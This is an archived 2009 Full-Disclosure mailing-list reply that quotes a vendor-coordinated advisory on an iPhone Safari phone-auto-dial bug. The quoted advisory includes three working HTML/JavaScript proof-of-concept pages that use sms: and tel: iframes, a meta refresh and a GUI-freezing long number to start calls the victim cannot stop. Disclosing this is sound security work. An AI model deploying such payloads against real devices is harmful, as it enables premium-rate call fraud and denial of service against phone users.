lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4A39F3D1.4040802@betaversion.net>
Date: Thu, 18 Jun 2009 09:14:57 -0700
From: Mike Ely <me@...pehat.com>
To: Collin Mulliner <collin@...aversion.net>, bugtraq@...urityfocus.com,
	full-disclosure@...ts.grok.org.uk
Subject: Re: iPhone Safari phone-auto-dial vulnerability
 (original date: Nov. 2008)

Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)

FWIW, it didn't actually dial, just loaded the dialer with that number ready.  

Looks like this is a Webkit bug, not Safari. 

Collin Mulliner <collin@...aversion.net> wrote:

>Released since Apple published the iPhone 3.0 security fixes.
>
>Vulnerability Report
>
>--- BEGIN ADVISORY ---
>
>Manufacturer: Apple (www.apple.com)
>Device:       iPhone 3G (iPhone 1st Gen)
>Firmware:     2.1 (possible earlier versions)
>Device Type:  smart phone
>
>Subsystems: Safari (and mobile telephony)
>
>-----------------------------
>
>Short name:
>   iPhone Safari phone-auto-dial (vulnerability)
>
>Vulnerability class:
>   application logic bug
>
>Executive Summary:
>   A malicious website can initiate a phone call without the need of user
>   interaction. The destination phone number is chosen by the attacker.
>
>Risk: MEDIUM-HIGH
>   Medium to high risk due to the possibility of financial gain through
>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>   U.S.). Denial-of-service against arbitrary phone numbers through
>   mass-calling. User cannot prevent attack.
>
>-----------------------------
>
>Reporter: Collin Mulliner <collin[AT]mulliner.org>
>
>-----------------------------
>
>Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>
>-----------------------------
>
>Time line:
>
>   Oct. 20. 2008: Reported vulnerability to vendor.
>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>                  Not commenting on the vulnerability itself.
>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>   Oct. 30. 2008: Sent additional information.
>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>                  version.
>   Nov. 20. 2008: Public disclosure.
>   Jun. 18. 2009: Full-Disclosure.
>
>-----------------------------
>
>Fix:
>
>   iPhone OS 2.2
>   iPhone OS 2.2.1
>   iPhone OS 3.0
>	
>-----------------------------
>
>Technical Details:
>
>   The Safari version running on the iPhone supports handling the TEL [1]
>   protocol through launching the telephony/dialer application. This is
>   done by passing the provided phone number to the telephony
>   application. Under normal conditions, loading a tel: URI results in a
>   message box asking the user's permission to call the given number. The
>   user is presented with the simple choice to either press call or
>   cancel.
>
>   A TEL URI can be opened automatically if the TEL URI is used as the
>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>   the location of a HTTP 30X redirect, and as the location of the
>   current or a new window using javascript.
>
>   We discovered a security vulnerability that dismisses the "ask for
>   permission to call" dialog in a way that chooses the "call" option
>   rather than the "cancel" option.
>	
>   This condition occurs if a TEL URI is activated at the same time
>   Safari is closed by launching an external application, for example
>   launching the SMS application (in order to handle a SMS URI [2]). The
>   SMS application can be launched through placing a SMS URI as the
>   source of an iframe. This is shown in the first proof-of-concept
>   exploit below.
>	
>   Further investigation showed that this behavior can be reproduced by
>   launching other applications such as: Maps, YouTube, and iTunes.
>   Launching these applications can be achieved through loading special
>   URLs using the meta refresh tag. This is shown in the second
>   proof-of-concept exploit below.
>
>   We also discovered that the bug can also be triggered through popup
>   windows (e.g. javascript alert). In this situation the initiating app
>   does not need to be termianted in order to active the call.
>	
>   Finally, we discovered a second bug that can be used to perform
>   malicious phone calls that cannot be prevented or canceled by the
>   victim. This bug allows the attacker to freez the GUI (graphical user
>   interface) for a number of seconds. While the GUI is frozen the call
>   progresses in	the background and cannot be stopped by the victim user.
>   Freezing the GUI is achieved by passing a "very long" phone number to
>   the SMS application. The SMS application, immediately after being
>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>   be performed fast enough in order to prevent the malicious call.
>	
>
>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>
>-----------------------------
>
>Further Discussion:
>
>   The dialing dialog is clearly shown to the user also the user, in most
>   cases, can't press cancel quick enough in order to stop the initiation
>   of the call. Once the external application is launched, the telephony
>   application is running in the background performing the call. Only
>   the call forwarding dialog (containing the "dismiss" button) indicates
>   a call being made.
>
>-----------------------------
>
>Proof-of-Concept with plain HTML using the SMS application:
>
>   <html>
>   <head>
>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>   </title>
>   </head>
>   <body>
>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>   <!-- second iframe is to attack quick users who manage to close the
>        first call-dialog //-->
>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>   </body>
>   </html>
>
>Proof-of-Concept using javascript and the Maps application:
>
>   <html>
>   <head>
>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>   </title>
>   <meta http-equiv="refresh" content="0;
>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>   </head>
>   <body>
>   <script lang=javascript>
>   function a() {
>    document.write("<iframe src=\"tel:+14089748388\" WIDTH=50 
>HEIGHT=10></iframe>");
>   }
>   setTimeout("a()", 100);
>   </script>
>   </body>
>   </html>
>	
>Proof-of-Concept attack where the victim user cannot stop the malicious 
>phone call:
>
>   <html>
>   <head>
>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>   </title>
>   </head>
>   <body>
>   <script lang=javascript>
>   l = "<iframe src=\"sms:";
>   for (i = 0; i < 10000; i++) {
>           l = l + "3340948034298232";
>   }
>   l = l + "\" width=10 height=10></iframe><iframe
>   src=\"tel:+14089748388\" height=10 width=10></iframe>";
>   document.write(l);
>   </script>
>   </body>
>   </html>
>
>-----------------------------
>
>More Detailed Information:
>
>  Demo video available at:
>   http://www.mulliner.org/iphone/
>
>  Advisories:
>   http://www.mulliner.org/security/advisories/
>
>--- END ADVISORY ---
>
>
>-- 
>Collin R. Mulliner <collin@...aversion.net>
>info/pgp: finger collin@...aversion.net
>If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>does!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ